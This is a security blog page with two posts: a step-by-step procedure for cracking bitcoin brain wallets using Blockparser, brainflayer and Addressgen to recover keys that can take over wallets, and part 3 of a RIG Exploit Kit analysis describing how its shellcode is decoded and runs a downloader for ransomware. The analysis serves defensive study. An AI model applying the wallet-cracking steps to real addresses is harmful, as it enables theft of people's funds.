After downloading the entire Blockchain we move into the second step. Parse the Blockchain.  The tool to perform this heavy lifting exercise is called Blockparser and is a powerful utility, open source, written in C++ that was created by Znort987. The tool doesn’t seem to be maintained anymore but is still able to perform its work. When blockparser performs the parsing, it creates and keeps the index in RAM which means with the current size of the blockchain you need enough RAM to be able to parse it in reasonable amount of time. The tool can perform various task but for this exercise we are interested in the allBalances command. To perform the parsing, I used a system with 64 GB ram and the process was smooth. I tried it on a system with 32Gb and stopped it due to the heavy swapping that was happening. The allBalances produced a 30Gb text file. The image below exemplifies these steps.

blockchainparsing

Third step is to extract the hash160 addresses from the allBalances. We are interested in the hash160 because this field contains the representation of the Bitcoin public key. Below you can see the output of allBalances.

allbalances

Forth step, we create a bloom filter with the tool hex2blf which is part of the brainflayer toolkit. We also need to create a binary file containing all the hashes sorted in order to be used with the bloom filter. This will reduce the false positives.

Fifth step, we launch brainflayer using our favorite dictionary against the bloom filter file we generated in the previous step. If there is a match you will see the password or passphrase and the corresponding hash. In the output of cracked password you could see C or U in the second column. This is to indicate if the key is Compressed or Uncompressed. In the below image you can see these steps.

brainflayer

Sixth step and last step is to create the Elyptic Curve key pair using the known password or passphrase. This can be done using the tool Addressgen created by sarchar. Addressgen is a utility written in Python 3 to generate private keys and their corresponding addresses using secp256k1. This utility will allow you to generate the ECDSA key pair which can be used to take over the wallet.

generateaddress

Financial gain is a significant incentive to have people performing all kinds of activities in order to attempt to steal your coins. If you are interested in attacks against the Blockchain I would suggest looking at the different papers created by the professor Dr. Nicolas Courtois and available on his website. On a different note, there are other researchers that are brute forcing the entire bitcoin private key keyspace in order to find private keys for addresses that have funds. There is one project that has the code name Large Bitcoin Collider which is a distributed effort with a pool where people can contribute computing power. The thread on Bitcointalk forum is quite interesting and the author has the following aim for this project: “allow the Bitcoin community to actually have a better shot at risk assessment of this threat vector. Right now, the math says the danger is negligible. Should there at some point be evidence or indication of the contrary, then it’s still better to have a project like this for analysis/experimentation of this concrete attack vector”. The author also writes that the project is a derivative of brainflayer and supervanitygen. Moreover, brainflayer can also perform brute force attack, sequentially against the entire private key space. This would be unfeasible to perform in a reasonable time frame but better to view the talk “Stealoing Bitcoin with Math – HOPE XI” given by Fillippo Valsorda and Ryan’s where among other things they show how quick brain wallets get drained, attacks against newer Brainwallet implementations and other attacks against Eliptic Curve Digital Signature Algorithm (ECDSA).

 

References:
Mastering Bitcoin – Unlocking Digital Cryptocurrencies by Andreas M. Antonopoulos

Tagged , , , ,

RIG Exploit Kit Analysis – Part 3

Over the course of the last two articles (part 1 & part 2), I analyzed a recent drive-by-download campaign that was delivering the RIG Exploit Kit . In this article, I will complete the analysis by looking at the shellcode that is executed when the exploit code is successful.  As mentioned in the previous articles, each one of the two exploits has shellcode that is used to run malicious code in the victims system. The shellcode objective is the same across the exploits: Download, decrypt and execute the malware.

In part 1, when analyzing the JavaScript that was extracted from the RIG landing page we see that at the end there was a function that contained a hex string of 2505 bytes. This is the shellcode for the exploit CVE-2013-2551.  In a similar way but to exploit  CVE-2015-5122 on the second stage Flash file, inside the DefineBinaryData tag 3, one of the decrypted strings contained a hex string of 2828 bytes.

So, how can we analyze this shellcode and determine what it does?

You can copy the shellcode and create a skeletal executable that can then be analyzed using a debugger or a dissassembler. First, the shellcode needs to be converted into hex notation (\x). This can be done by coping the shellcode string into a file and then running the following Perl one liner “$cat shellcode | perl -pe ‘s/(..)/\\x$1/g’ >shellcode.hex”. Then generate the skeletal shellcode executable with shellcode2exe.py script written by Mario Villa and later tweaked by Anand Sastry.  The command is “$shellcode2exe.py –s shellcode shellcode.exe”. The result is a windows executable for the x86 platform that can be loaded into a debugger.  Another way to convert shellcode is to use the converter tool from http://www.kahusecurity.com

Next step is to load the generated executable into OllyDbg. Stepping through the code one can see that the shellcode contains a deobfuscation routine. In this case, the shellcode author is using a XOR operation with key 0x84. After looping through the routine, the decoded shellcode shows a one liner command line.

rigexshellcodeolly

After completing the XOR de-obfuscation routine the shellcode has to be able to dynamically resolve the Windows API’s in order to make the necessary system calls on the environment where is being executed. To make system calls the shellcode needs to know the memory address of the DLL that exports the required function. Popular API calls among shellcode writers are LoadLibraryandGetProcAddress. These are common functions that are used frequently because they are available in the Kernel32.dll which is almost certainly loaded into every Windows operating system.  The author can then get the address of any user mode API call made.

Therefore, the first step of the shellcode is to locate the base address of the memory image of Kernel32.dll. It then needs to scan its export table to locate the address of the functions needed.

How does the shellcode locate the Kernel32.dll? On 32-bit systems, the malware authors use a well-known technique that takes advantage of a structure that resides in memory and is available for all processes. The Process Environment Block (PEB). This structure among other things contains linked lists with information about the DLLs that have been loaded into memory. How do we access this structure? A pointer exists to the PEB that resides insider another structure known as the Threat Information Block (TIB) which is always located at the FS segment register and can be identified as FS:[0x30](Zeltser, L.). Given the memory address of the PEB the shellcode author can then browse through the different PEB linked lists such as the InLoadOrderModuleList which contains the list of DLL’s that have been loaded by the process in load order. The third element of this list corresponds to the Kernel32.dll.  The code can then retrieve the base address of the DLL. This technique was pioneered by one of the members of the well-known and prominent virus and worm coder group 29A and written in volume 6 of their e-zine in 2002. The figure below shows a snippet of the shellcode that contains the different sequence of assembly instructions in order for the code to find the Kernel32.dll.

rigekshellcodeapildr

The next step is to retrieve the address of the required function. This can be obtained by navigating through the Export Directory Table of the DLL. In order to find the right API there is a comparison made by the shellcode against a string. When it matches, it fetches its location and proceeds.  This technique was pioneered and is well described in the paper “Win32 Assembly Components” written in 2002 by The Last Stage of Delirium Research Group (LSD). Finally, the code invokes the desired API. In this case, the shellcode uses the CreateProcessA API where it will spawn a new process that will carry out the command line specified in the command line string.

rigekshellcodecreateproc

This command will launch a new instance of the Windows command interpreter, navigate to the users %tmp% folder and then redirect a set of JavaScript  commands to a file. Finally it will invoke Windows Script Host and launch this JavaScript file with two parameters. One is the decryption key and the other is the URL from where to fetch the malicious payload. Essentially this shellcode is a downloader. The full command is shown in the figure below.

rigekshellcodedecoded

If the exploits are sucessfull and the shellcode is executed then the payload is downloaded. In this case the payload is variant of Locy ransomware and a user in Windows 7 box would see the User Account Control dialog box popping up asking to run it.

rigekuac

That’s it! We now have a better understanding how this variant of the RIG Exploit Kit works and what it does and how. All stages of the RIG Exploit Kit enforce different protection mechanisms that slow down analysis, prevent code reuse and evade detection. It begins with multiple layers of obfuscated JavaScript using junk code and string encoding that hides the code logic and launches a browser exploit. Then it goes further by having multiple layers of encrypted Flash files with obfuscated ActionScript. The ActionScript is then responsible to invoke an exploit with encoded shellcode that downloads encrypted payload. In addition, the modular backend framework allows the threat actors to use different distribution mechanisms to reach victims globally. Based on this modular backend different filtering rules are enforced and different payloads can be delivered based on the victim Geolocation, browser and operating system. This complexity makes these threats a very interesting case study and difficult to defend against. Against these capable and dynamic threats, no single solution is enough. The best strategy for defending against this type of attacks is to understand them and to use a defense in depth strategy – multiple security controls at different layers.

References:

SANS FOR610: Reverse-Engineering Malware: Malware Analysis Tools and Techniques
Neutrino Exploit Kit Analysis and Threat Indicators

Tagged , , , , , , , ,
gb_master's /dev/null

... and I said, "Hello, Satan. I believe it's time to go."

Source Code Auditing, Reversing, Web Security

Finding Hidden codes in the software

BruteForce Lab

security, programming, devops, visualization, the cloud

Count Upon Security

Increase security awareness. Promote, reinforce and learn security skills.

Naked Security

Computer Security News, Advice and Research

Didier Stevens

(blog \'DidierStevens)

malwology

Adventures in double-clicking malware / by Anuj Soni

Rational Survivability

Hoff's Ramblings about Information Survivability, Information Centricity, Risk Management and Disruptive Innovation.

SANS Internet Storm Center, InfoCON: green

Increase security awareness. Promote, reinforce and learn security skills.

TaoSecurity

Increase security awareness. Promote, reinforce and learn security skills.

Schneier on Security

Increase security awareness. Promote, reinforce and learn security skills.

Technicalinfo.net Blog

Increase security awareness. Promote, reinforce and learn security skills.

Lenny Zeltser

Increase security awareness. Promote, reinforce and learn security skills.

Krebs on Security

In-depth security news and investigation